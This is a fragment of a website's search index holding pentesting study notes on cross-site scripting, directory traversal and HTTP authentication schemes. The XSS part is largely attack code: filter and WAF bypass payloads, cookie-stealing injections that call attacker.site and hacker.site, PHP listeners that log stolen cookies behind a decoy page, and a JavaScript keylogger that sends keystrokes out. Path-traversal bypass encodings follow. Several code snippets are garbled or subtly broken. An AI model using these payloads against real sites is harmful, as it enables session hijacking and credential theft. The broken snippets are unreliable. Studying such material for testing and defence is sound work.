                                        But, of course, you may use an extensive repository of payloads. This OWASP cheat sheet is kind of a bible.

                                        XSS attacks are typically exploited for the following objectives:

                                        1. Cookie stealing/Session hijacking - Stealing cookies from users with authenticated sessions, allowing you to login as other users by leveraging the authentication information contained within a cookie.
                                        2. Browser exploitation - Exploitation of browser vulnerabilities.
                                        3. Keylogging - Logging keyboard entries made by other users on a web application.
                                        4. Phishing - Injecting fake login forms into a webpage to capture credentials.
                                        5. ... and many more.
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#types-of-cross-site-scripting-xss","title":"Types of Cross-Site Scripting XSS","text":"

                                        1. Reflected attacks: malicious payload is carried inside the request that the browser sends. You need to bypass the anti-xss filters. This way when the victim clicks on it it will be sending their information to the attacker (limited to js events).

                                        Example:

                                        http://victim.site/seach.php?find=<payload>\n

                                        2. Persistent or stored XSS attacks: payload is sent to the web server and then stored. The most common vector for these attacks are HTML forms that submit content to the web server and then display that content back to the users (comments, user profiles, forum posts\u2026). Basically if the url somehow stays in the server, then, every time that someone accesses to it, they will suffer the attack.

                                        3. DOM based XSS attacks: tricky one. This time the javascript file procedes from the server, and in that sense, the file is trusteable. Nevertheless, the file modifies changes in the web structure. Quoting OWASP: \"DOM Based XSS (or as it is called in some texts, \u201ctype-0 XSS\u201d) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM \u201cenvironment\u201d in the victim\u2019s browser used by the original client side script, so that the client side code runs in an unexpected manner\".

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-reflected-cross-site-scripting","title":"1. Reflected Cross Site Scripting","text":"

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.1. Testing for Reflected Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 7.1 WSTG-INPV-01 Testing for Reflected Cross Site Scripting - Identify variables that are reflected in responses. - Assess the input they accept and the encoding that gets applied on return (if any).

                                        Reflected\u00a0Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response. The injected attack is not stored within the application itself; it is non-persistent and only impacts users who open a maliciously crafted link or third-party web page. When a web application is vulnerable to this type of attack, it will pass unvalidated input sent through requests back to the client.

                                        XSS Filter Evasion Cheat Sheet

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes","title":"Causes","text":"

                                        This vulnerable PHP code in a welcome page may lead to an XSS attack:

                                        <?php $name = @$_GET['name']; ?>\n\nWelcome <?=$name?>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-persistent-or-stored-cross-site-scripting","title":"2. Persistent or stored Cross Site Scripting","text":"OWASP reference

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 7.2 WSTG-INPV-02 Testing for Stored Cross Site Scripting - Identify stored input that is reflected on the client-side. - Assess the input they accept and the encoding that gets applied on return (if any).

                                        Stored cross-site scripting is a vulnerability where an attacker is able to inject Javascript code into a web application\u2019s database or source code via an input that is not sanitized. For example, if an attacker is able to inject a malicious XSS payload in to a webpage on a website without proper sanitization, the XSS payload injected in to the webpage will be executed by the browser of anyone that visits that webpage.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_1","title":"Causes","text":"

                                        This vulnerable PHP code in a welcome page may lead to a stored XSS attack:

                                        <?php \n$file  = 'newcomers.log';\nif(@$_GET['name']){\n    $current = file_get_contents($file);\n    $current .= $_GET['name'].\"\\n\";\n    //store the newcomer\n    file_put_contents($file, $current);\n}\n//If admin show newcomers\nif(@$_GET['admin']==1)\n    echo file_get_contents($file);\n?>\n\nWelcome <?=$name?>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-dom-cross-site-scripting-type-0-or-local-xss","title":"3. DOM Cross Site Scripting (Type-0 or Local XSS)","text":"OWASP reference

                                        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.2. Testing for Stored Cross Site Scripting

                                        ID Link to Hackinglife Link to OWASP Description 11.1 WSTG-CLNT-01 Testing for DOM-Based Cross Site Scripting - Identify DOM sinks. - Build payloads that pertain to every sink type.

                                        The key in exploiting this XSS flaw is that the client-side script code can access the browser's DOM, thus all the information available in it. Examples of this information are the URL, history, cookies, local storage,... Technically there are two keywords: sources and sinks. Let's use the following vulnerable code:

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#causes_2","title":"Causes","text":"

                                        This vulnerable code in a welcome page may lead to a DOM XSS attack: http://example.com/#w!Giuseppe

                                        <h1 id='welcome'></h1>\n<script>\n    var w = \"Welcome\";\n    var name = document.location.hash.search(/#W!1)+3,\n                document.location.hash.length\n                );\n    document.getElementById('Welcome').innerHTML = w + name;\n</script>\n

                                        location.hash is the source of the untrusted input. .innerHTML is the sink where the input is used.

                                        To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript. The most common source for DOM XSS is the URL, which is typically accessed with the\u00a0window.location\u00a0object.

                                        What is a sink? A sink is a potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it. For example, the\u00a0eval()\u00a0function is a sink because it processes the argument that is passed to it as JavaScript. An example of an HTML sink is\u00a0document.body.innerHTML\u00a0because it potentially allows an attacker to inject malicious HTML and execute arbitrary JavaScript.

                                        Summing up: you should avoid allowing data from any untrusted source to be dynamically written to the HTML document.

                                        Which sinks can lead to DOM-XSS vulnerabilities:

                                        • document.write()
                                        • document.writeln()
                                        • document.replace()
                                        • document.domain
                                        • element.innerHTML
                                        • element.outerHTML
                                        • element.insertAdjacentHTML
                                        • element.onevent

                                        This project, DOMXSS wiki aims to identify sources and sinks methods exposed by public, widely used javascript frameworks.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-universal-xss-uxss","title":"4. Universal XSS (UXSS)","text":"

                                        Universal XSS is a particular type of Cross Site Scripting that does not leverage the flaws against web application, but the browser, its extensions or its plugins. A typical example for this could be found within the Google Chrome WordReference Extension, that did not properly sanitized the input of the search.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#attack-techniques","title":"Attack techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#quick-steps-to-test-xss","title":"Quick steps to test XSS","text":"

                                        1. Detect input vectors. Find a reflection point for a given input entry. This is tricky, since sometimes the entered value is reflected on a different part of the application.

                                        2. Check impact. Once identified the reflection point, inspect source code and recursively expand all tags to make sure that it's really a reflection point and it's not parsing your input. This is also tricky, but there are techniques as encoding and double encoding that will allow us to bypass some XSS filters.

                                        3. Classify correctly what your injection point is like. Are you injecting raw HTML directly or a HTML tag? Are you injecting a tag attribute value? Are you injecting into the javascript code? Where in the DOM are you operating? Is there a WAF tampering your input? Answering these questions is the same of knowing what characters you are needing to escape.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-bypassing-xss-filters","title":"1. Bypassing XSS filters","text":"

                                        Reflected cross-site scripting attacks are prevented as the web application sanitizes input, a web application firewall blocks malicious input, or by mechanisms embedded in modern web browsers.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#11-injecting-inside-raw-html","title":"1.1. Injecting inside raw HTML","text":"
                                        <script>alert(1)</script>\n<img src=x onerror=alert(1) />\n<svg onload=alert('XSS')>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#12-injecting-into-html-tags","title":"1.2. Injecting into HTML tags","text":"

                                        Firstly, some common escaping characters that may be parsed (and you need to further investigate to see how the application is treating them) are:

                                        • >\u00a0(greater than)
                                        • <\u00a0(less than)
                                        • &\u00a0(ampersand)
                                        • '\u00a0(apostrophe or single quote)
                                        • \"\u00a0(double quote)

                                        Additionally, there might exist a filter for the characters script. Being that the case:

                                        1. Insert unexpected variations in the syntax such as random capitalization, blank spaces, new lines...:

                                        \"><script >alert(document.cookie)</script >\n\"><ScRiPt>alert(document.cookie)</ScRiPt>\n

                                        2. Bypass non-recursive filtering:

                                        <scr<script>ipt>alert(documInjecting into HTML tagsent.cookie)</script>\n

                                        3. Bypass encoding.

                                        # Simple encoding\n\"%3cscript%3ealert(document.cookie)%3c/script%3e\n\n# More encoding techniques: \n# 1. We lookk for a charcode calculator and enter our payload, for instance \"lala\" would be: 34, 108, 97, 108, 97, 34\n# 2. Them we put those numbers in our payload\n<script>alert(String.fromCharCode(34, 108, 97, 108, 97, 34))</script>\n

                                        Double encoding is very effective. I've run into cases in the wild.

                                        4. Unexpected parent tags:

                                        <svg><x><script>alert('1'&#41</x>\n

                                        5. Unexpected weird attributes, null bytes:

                                        <script x>\n<script a=\"1234\">\n<script ~~~>\n<script/random>alert(1)</script>\n<script ///Note the newline\n>alert(1)</script>\n<scr\\x00ipt>alert(1)</scr\\x00ipt>\n

                                        More. If the scripttag is super blacklisted in all their forms, use other tags:

                                        <img> ... <IMG>\n<iframe>\n<input>\n

                                        Or even, make out your own:

                                        <lalala> \n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#13-injecting-into-html-attributes","title":"1.3. Injecting into HTML attributes","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#a-id","title":"a) id","text":"

                                        For instance, this injection endpoint (INJ):

                                        <div id=\"INJ\">\n

                                        A payload for grabbing the cookies and have them sent to our attacker server would be:

                                        x\" onmouseover=\"new Image().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#b-href","title":"b) href","text":"

                                        For instance, this injection endpoint (INJ):

                                        <a href=\"victim.site/#INJ\">\n

                                        A payload for grabbing the cookies and have them sent to our attacker server would be:

                                        x\" onmouseover=\"new Image().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#c-height","title":"c) height","text":"

                                        For instance, this injection endpoint (INJ):

                                        <video  width=\"320\" height=\"INJ\">\n

                                        A payload for grabbing the cookies and have them sent to our attacker server would be:

                                        240\" src=x onerror=\"new Audio().src=\"https://attacker.site/c.php?cc='+escape(document.cookie)\n

                                        1. One nice technique is using non-common javascript events.

                                        # The usual payloads contains these events:\nalert()\nconfirm()\nprompt()\n\n# Try others:\nonload()\nonerror()\nonmousehover\n...\n

                                        See complete reference at: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

                                        2. Sometimes the events are filtered. This is a very common regex for filtering:

                                        (on\\w+\\s*=)\n

                                        Bypassing it:

                                        <svg/onload=alert(1)>\n<svg//////onload=alert(1)>\n<svg id=x;onload=alert(1)>\n<svg id='x'onload=alert(1)>\n

                                        3. Bettering up the filter:

                                        (?i)([\\s\\\"'`;\\/0-9\\=]+on\\w+\\s*=)\n

                                        Bypassing it:

                                        <svg onload%09=alert(1)>\n<svg %09onload=alert(1)>\n<svg %09onload%09=alert(1)>\n<svg onload%09%20%28%2c%3B=alert(1)>\n<svg onload%0B=alert(1)>\n

                                        https://shazzer.co.uk/vectors is a great resource to see potential attack vectors.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#14-going-beyond-the-scripttag","title":"1.4. Going beyond the <script>tag","text":"
                                        <a href=\"javascript:alert(1)\">click</a>\n<a href=\"data:text/html;base64,amF2YXNjcmlwdDphbGVyKDEp\">click</a>\n<form action=\"javascript:alert(1)\"><button>send</button></form>\n\n<form id=x></form><button form=\"x\" formaction=\"javascript:alert(1)\">send</button>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-bypassing-the-httponly-flag","title":"2. Bypassing the HTTPOnly flag","text":"

                                        The HTTPOnly flag can be enabled with the response header Set-Cookie:

                                        Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

                                        HTTPOnly forbids javaScript from accessing the cookies, for example, through the\u00a0Document.cookie\u00a0property.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#21-cross-site-tracing","title":"2.1. Cross Site Tracing","text":"

                                        OWASP Cross Site Tracing reference

                                        Technique for bypassing HTTPOnly flag. Since scripting languages are blocked due to the use of HTTPOnly, this technique proposes to use the HTTP TRACE method.

                                        HTTP TRACE method is a method used for debugging, and it echoes back input requests to the user. So, if we send HTTP headers normally inaccessible to Javascript, we will be able to read them.

                                        We will take advantage of the javascript object XMLHttpRequestthat provides a way to retrieve data from an URL without having to do a full page refresh:

                                        <script> //TRACE Request\n    var xmlhttp = new XMLHttpRequest()M\n    var url = 'http://victim.site/';\n    xmlhttp.withCredentials = true; // Send cookie header\n    xmlhttp.open('TRACE', url);\n\n    // Callback to log all response headers\n    function hand() { console.log(this.getAllResponseHeaders());}\n    xmlhttp.onreadystatechange = hand;\n\n    xmlhttp.send(); // Send the request\n\n</script>\n

                                        Modern browsers block the HTTP TRACE method in XMLHttpRequest and other scripting languages and libraries such as JQuery, Silverlight... But if the attacker finds another way of doing HTTP TRACE requests, then they can bypass the HTTPOnly flag.

                                        For instance, Amit Klein found a simple trick for IE 6.0 SP2. Instead of using TRACE for the method, he used \\r\\nTRACEand the payload worked under certain circumstances.

                                        CVE-2012-0053: Apache HTTPOnly cookie disclosure. For Apache HTTP Server 2.2.x through 2.2.21. For an HTTP-Header value exceeding the server limits, the server responded with a HTTP 400 Bad Request including the complete headers containing the HTTPOnly cookies. (https://gist.github.com/pilate/1955a1c28324d4724b7b). BeEF has a module named Apache Cookie Disclosure, available under Exploits section.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#22-beef-tunneling-proxy","title":"2.2. BeEF Tunneling Proxy","text":"

                                        An alternative to stealing protected cookies is to use the victim browser as a proxy. The Tunneling Proxy in BeEF exploits the XSS flaw and uses the victim browser to perform requests as the victim user to the web application. Basically, it tunnels requests through the hooked browser. By doing so, there is no way for the web application to distinguish between requests coming from legitimate user and requests forged by an atacker. BeEF allows you to bypass other web developer protection techniques such as using multiple validations (User-agent, custom headers,...)

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#bypassing-wafs","title":"Bypassing WAFs","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#modsecurity","title":"ModSecurity","text":"
                                        <svg onload='new Function`[\u201c_Y000!_\u201d].find(al\\u0065rt)`'>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#examples-of-typical-attacks","title":"Examples of typical attacks","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#1-cookie-stealing-examples-and-techniques","title":"1. Cookie stealing: examples and techniques","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-1","title":"Example 1","text":"

                                        Identify an injection endpoint and test that the app is vulnerable to a basic xss payload such as:

                                        <script>alert(\u2018lala\u2019)</script>\n

                                        Once you know is vulnerable, prepare a malicious javascript code for stealing the cookies:

                                        <script>\nvar i = new Image();\ni.src = \"http://attacker.site/log.php?q=\"+document.cookie;\n</script>\n

                                        Add that code to the injection endpoint that you detected in step 1. That code will save the cookie in a text file on the attacker site.

                                        Create a text file (log.php) for capturing the sent cookie in the attacker site:

                                            <?php\n        $filename=\u201d/tmp/log.txt\u201d;\n        $fp=fopen($filename, \u2018a\u2019);\n        $cookie=$_GET[\u2018q`];\n        fwrite($fp, $cookie);\n        fclose($fp);\n    ?>\n

                                        Open the listener in the attacker site and send the crafted URL with the payload included. Once someone open it, they will be sending to the attacker their cookies jar.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#example-2","title":"Example 2","text":"
                                        1. The attacker creates a get.php file and saves it into its server.

                                        2. This php file will store the data that the attacker server receives into a file.

                                        3. This could be the content of the get.php file:

                                        <?php\n    $ip = $_SERVER(\u2018REMOTE_ADDR\u2019);\n    $browser = $_SERVER(\u2018HTTP_USER_AGENT\u2019);\n\n    $fp = fopen(\u2018jar.txt\u2019, \u2018a\u2019);\n\nfwrite($fp, $ip . \u2018 \u2018 . $browser . \u201c \\n\u201d);\nfwrite($fp, urldecode($_SERVER[\u2018QUERY_STRING\u2019]) . \u201c \\n\\n\u201d);\nfclose($fp);\n?>\n
                                        1. Now in the web server the attacker achieve to store this payload:
                                        <script>\nvar i = new Image();\ni.src = \u201chttp://attacker.site/get.php?cookie=\u201d+escape(document.cookie);\n</script>\n\n# Or in one line:\n<script>var i = new Image(); i.src = \u201chttp://10.86.74.7/moville.php?cookie=\u201d+escape(document.cookie); </script>\n
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#techniques-for-cookie-stealing","title":"Techniques for cookie stealing","text":"

                                        Let's suppose we have our PHP script C.php listening on our hacker.site domain.

                                        Example of C.php Simple Listerner:

                                        # Instruct the script to simply store the GET['cc'] content in a file\n<?php\nerror_reporting(0); # Turn off all error reporting\n$cookie= $_GET['cc']; # Request to log\n$file= '_cc_.txt'; # The log file\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$cookie.\"\\n\"); # Append the cookie\nfclose($handle); # Append the cookie\n\necho '<h1>Page under construction</h1>'; # Trying to hide suspects.\n

                                        Example of C.php Listerner recording hosts, time of logging, IP addresses:

                                        # Instruct the script to simply store the GET['cc'] content in a file\n<?php\nerror_reporting(0); # Turn off all error reporting\n\nfunction getVictimIP()= { ... } # Function that returns victim IP\nfunction collect() {\n$file= '_cc_.txt'; # The log file\n$date=date(\"l dS of F Y h:i:s A\");\n$IP=getVictimIP();\n$cookie= $_SERVER['QUERY_STRING'];\n\n$log=\"[$date]\\n\\t> VictimIP: $IP\\n\\t> Cookies: $cookie\\n\\t> Extra info: $info\\n\";\n$handle= fopen($file,\"a\"); # Open log file in append mode\nfwrite($handle,$log.\"\\n\\b\"); # Append the cookie\nfclose($handle); # Append the cookie\n}\ncollect();\necho '<h1>Page under construction</h1>'; # Trying to hide suspects.\n

                                        Additionally we can use: netcat, Beef,...

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#2-dom-based-attack-incorrect-use-of-eval","title":"2. DOM based attack: incorrect use of eval()","text":"

                                        In the following website we can see the code below:

                                        And in the source code we can pinpoint this script:

                                        <script>\n    var statement = document.URL.split(\"statement=\")[1];\n    document.getElementById(\"result\").innerHTML = eval(statement);\n</script>\n

                                        This JavaScript code is responsible for calculating and dynamically displaying the result of the arithmetic operation via the DOM splits the URL and parses the value of the\u00a0statement\u00a0parameter to the JavaScript\u00a0eval()\u00a0function for evaluation/calculation.

                                        The JavaScript\u00a0eval()\u00a0function is typically used by developers to evaluate JavaScript code, however, in this case, it has been improperly implemented to evaluate/perform the arithmetic operation specified by the user.

                                        NOTE: The eval()\u00a0function should never be used to execute JavaScript code in the form of a string as it can be leveraged by attackers to perform arbitrary code execution.

                                        Given the improper implementation of the\u00a0eval()\u00a0function, we can inject our XSS payload as a value of the\u00a0statement\u00a0parameter and forces the\u00a0eval()\u00a0function to execute the JavaScript payload.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#3-defacements","title":"3. Defacements","text":"

                                        We may categorize defacements into two types: Non-persistent (Virtuals) and Persistent.

                                        • Non-persistent defacements don't modify the content hosted on the target web application. They are basically abusing Reflected XSS.
                                        # Code\n<?php $name = @$_GET['name']; ?>\nWelcome <?=$name?>\n\n# URL\nhttps://victim.site/XSS/reflected.php?name=%3Cscript%3Edocument.body.innerHTML=%22%3Cimg%20src=%27http://hackersite/pwned.png%27%3E%22%3C/script%3E\n
                                        • Persistent defacements modify permanently the content hosted on the target web application. They are basically abusing Stored XSS.

                                        Tools for cloning a website

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#4-keyloggers","title":"4. Keyloggers","text":"

                                        A tool: http_javascript_keylogger. See also my notes on that metasploit module.

                                        Event logger from BeEF.

                                        The following code:

                                        var keys = \"\" //Where > where to store the key strokes\ndocument.onkeypress = function(e) {\n    var get = windows.event ? event : eM\n    var key = get.keyCode ? get.keyCode : get.charCode;\n    key = String.fromCharCode(key);\n    keys += key;\n}\n\nwindow.setInterval(function()) {\n    if(keys != \"\") {\n        //HOW> sends the key strokes via GET using an Image element to listening hacker.site server\n        var path = encodeURI(\"http://hacker.site/keylogger?k=\" + keys);\n        new Image().src = path;\n        keys = \"\";\n\n    }\n}, 1000; // WHEN > sends the key strokes every second\n

                                        Additionally, we have the metasploit module auxiliary(http_javascript_keylogger), an advance version of the previous javascript code. It creates the Javascript payload with a keylogger, which could be injected within the vulnerable web page and automatically starts the listening server. To see how it works, set the DEMO option to true.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#5-network-attacks","title":"5. Network attacks","text":"

                                        A way to enter within intranet networks is by passing through HTTP traffic that, despite other protocols, is usually allowed to pass by firewalls.

                                        1. IP detection

                                        The first step before putting your feet in a network is to retrieve as much network information as possible about the hooked browser. For instance by revealing its internal IP address and subnet.

                                        Traditionally, this required the use of external browser's pluggins such as Java JRE and some interaction from the victim: - Installing My Address Java Applet: Unsigned java applet that retrieves IP. - Changing the java security settings enabling or reducing the security level).

                                        Use of https://net.ipcalf.com/ , that abuses WebRTC HTML5 feature.

                                        2. Subnet detection

                                        3. Ping Sweeping

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#6-bypassing-restrictions-in-frameset-tag","title":"6. Bypassing restrictions in frameset tag","text":"

                                        See https://www.doyler.net/security-not-included/frameset-xss.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#mitigations-for-cookie-stealing","title":"Mitigations for cookie stealing","text":"","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#httponly","title":"HTTPOnly","text":"

                                        The HTTPOnly flag can be enabled with the response header Set-Cookie:

                                        Set-Cookie: <cookie-name>=<cookie-value>; HttpOnly\n

                                        HTTPOnly forbids javaScript from accessing the cookies, for example, through the\u00a0Document.cookie\u00a0property. Note that a cookie that has been created with\u00a0HttpOnly\u00a0directive will still be sent with JavaScript-initiated requests, for example, when calling\u00a0XMLHttpRequest.send()\u00a0or\u00a0fetch(). This mitigates attacks against cross-site scripting XSS.

                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/cross-site-scripting-xss/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • XSSER: An automated web pentesting framework tool to detect and exploit XSS vulnerabilities
                                        • Vectors (payload) regularly updated: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet.
                                        • Evasion Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html.
                                        ","tags":["web pentesting","attack","xss"]},{"location":"webexploitation/directory-traversal/","title":"Directory Traversal attack","text":"OWASP

                                        OWASP Web Security Testing Guide 4.2 > 5. Authorization Testing > 5.1. Testing Directory Traversal File Include

                                        ID Link to Hackinglife Link to OWASP Description 5.1 WSTG-ATHZ-01 Testing Directory Traversal File Include - Identify injection points that pertain to path traversal. - Assess bypassing techniques and identify the extent of path traversal (dot-dot-slash attack, Local/Remote file inclusion) Resources
                                        • PayAllTheThings

                                        Directory traversal vulnerabilities, also known as path traversal or directory climbing vulnerabilities, are a type of security vulnerability that occurs when a web application allows unauthorized access to files and directories outside the intended or authorized directory structure. Directory traversal vulnerabilities can lead to serious data breaches and system compromises if not addressed/mitigated.

                                        Directory traversal vulnerabilities typically arise from improper handling of user input, especially when dealing with file or directory paths. This input could be obtained from URL parameters, user-generated content, or other sources. An attacker takes advantage of lax input validation or insufficient sanitization of user inputs. They manipulate the input by adding special characters or sequences that trick the application into navigating to directories it shouldn't have access to.

                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#before-testing","title":"Before testing","text":"

                                        Each operating system uses different characters as path separator:

                                        Unix-like OS:

                                        root directory: \"/\"\ndirectory separator: \"/\"\n

                                        Windows OS' Shell':

                                        root directory: \"<drive letter>:\\\"\ndirectory separator: \"\\\" or \"/\"\n

                                        Classic Mac OS:

                                        root directory: \"<drive letter>:\"\ndirectory separator: \":\"\n
                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#basic-exploitation","title":"Basic exploitation","text":"

                                        We can use the\u00a0..\u00a0characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter.

                                        ../\n..\\\n..\\/\n\n\n#####\n# - URL encoding and double URL encoding\n#####\n\n# ../\n%2e%2e%2f\n%2e%2e/\n..%2f\n\n# ..\\\n%2e%2e%5c\n%2e%2e\\\n..%5c\n%252e%252e%255c\n\n... \n%252e%252e%252f\n%c0%ae%c0%ae%c0%af\n%uff0e%uff0e%u2215\n%uff0e%uff0e%u2216\n
                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#interesting-files","title":"Interesting files","text":"

                                        Interesting Windows files Interesting Linux files

                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/directory-traversal/#tools-and-payloads","title":"Tools and payloads","text":"
                                        • See updated chart: Attacks and tools for web pentesting.
                                        • DotDotPwn - The Directory Traversal Fuzzer -\u00a0http://dotdotpwn.sectester.net
                                        ","tags":["pentesting","web pentesting"]},{"location":"webexploitation/http-authentication-schemes/","title":"HTTP Authentication Schemes","text":"

                                        This resource is pretty awesome: https://learn.microsoft.com/en-us/dotnet/framework/wcf/feature-details/understanding-http-authentication.

                                        I'll be (CTRL-c-CTRL-v)ing what I think it's important.

                                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#understanding-http-authentication","title":"Understanding HTTP Authentication","text":"

                                        Authentication is the process of identifying whether a client is eligible to access a resource. The HTTP protocol supports authentication as a means of negotiating access to a secure resource.

                                        The initial request from a client is typically an anonymous request, not containing any authentication information. HTTP server applications can deny the anonymous request while indicating that authentication is required. The server application sends WWW-Authentication headers to indicate the supported authentication schemes.

                                        ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#http-authentication-schemes_1","title":"HTTP Authentication Schemes","text":"Authentication Scheme Description Anonymous An anonymous request does not contain any authentication information. This is equivalent to granting everyone access to the resource. Basic Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication. Digest Digest authentication is a challenge-response scheme that is intended to replace Basic authentication. The server sends a string of random data called a nonce to the client as a challenge. The client responds with a hash that includes the user name, password, and nonce, among additional information. The complexity this exchange introduces and the data hashing make it more difficult to steal and reuse the user's credentials with this authentication scheme. Digest authentication requires the use of Windows domain accounts. The digest realm is the Windows domain name. Therefore, you cannot use a server running on an operating system that does not support Windows domains, such as Windows XP Home Edition, with Digest authentication. Conversely, when the client runs on an operating system that does not support Windows domains, a domain account must be explicitly specified during the authentication. NTLM NT LAN Manager (NTLM) authentication is a challenge-response scheme that is a securer variation of Digest authentication. NTLM uses Windows credentials to transform the challenge data instead of the unencoded user name and password. NTLM authentication requires multiple exchanges between the client and server. The server and any intervening proxies must support persistent connections to successfully complete the authentication. Negotiate Negotiate authentication automatically selects between the Kerberos protocol and NTLM authentication, depending on availability. The Kerberos protocol is used if it is available; otherwise, NTLM is tried. Kerberos authentication significantly improves upon NTLM. Kerberos authentication is both faster than NTLM and allows the use of mutual authentication and delegation of credentials to remote machines. Windows Live ID The underlying Windows HTTP service includes authentication using federated protocols. However, the standard HTTP transports in WCF do not support the use of federated authentication schemes, such as Microsoft Windows Live ID. Support for this feature is currently available through the use of message security.","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#basic-http-authentication","title":"Basic HTTP Authentication","text":"

                                        Basic HTTP authentication is a simple authentication mechanism used in web applications and services to restrict access to certain resources or functionalities. Basic authentication sends a Base64-encoded string that contains a user name and password for the client. Base64 is not a form of encryption and should be considered the same as sending the user name and password in clear text. If a resource needs to be protected, strongly consider using an authentication scheme other than basic authentication.

                                        • Client Request: When a client (usually a web browser) makes a request to a protected resource on a server, the server responds with a 401 Unauthorized status code if the resource requires authentication.
                                        • Challenge Header: In the response, the server includes a WWW-Authenticate header with the value \"Basic.\" This header tells the client that it needs to provide credentials to access the resource.
                                        • Credential Format: The client constructs a string in the format username:password and encodes it in Base64. It then includes this encoded string in an Authorization header in subsequent requests. The header looks like this:

                                          • Authorization: Basic
                                          • Server Validation: When the server receives the request with the Authorization header, it decodes the Base64-encoded credentials, checks them against its database of authorized users, and grants access if the credentials are valid.

                                          • Access Granted or Denied: If the credentials are valid, the server allows access to the requested resource by responding with the resource content and a 200 OK status code. If the credentials are invalid or missing, it continues to respond with 401 Unauthorized.
                                          • ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#how-to-attack-it","title":"How to attack it","text":"

                                            You can perform dictionary attacks with Burpsuite, by encoding the payload with base64. You can also use hydra.

                                            ","tags":["authentication","windows","basic digest","NTLM"]},{"location":"webexploitation/http-authentication-schemes/#digest-http-authentication","title":"Digest HTTP Authentication","text":"

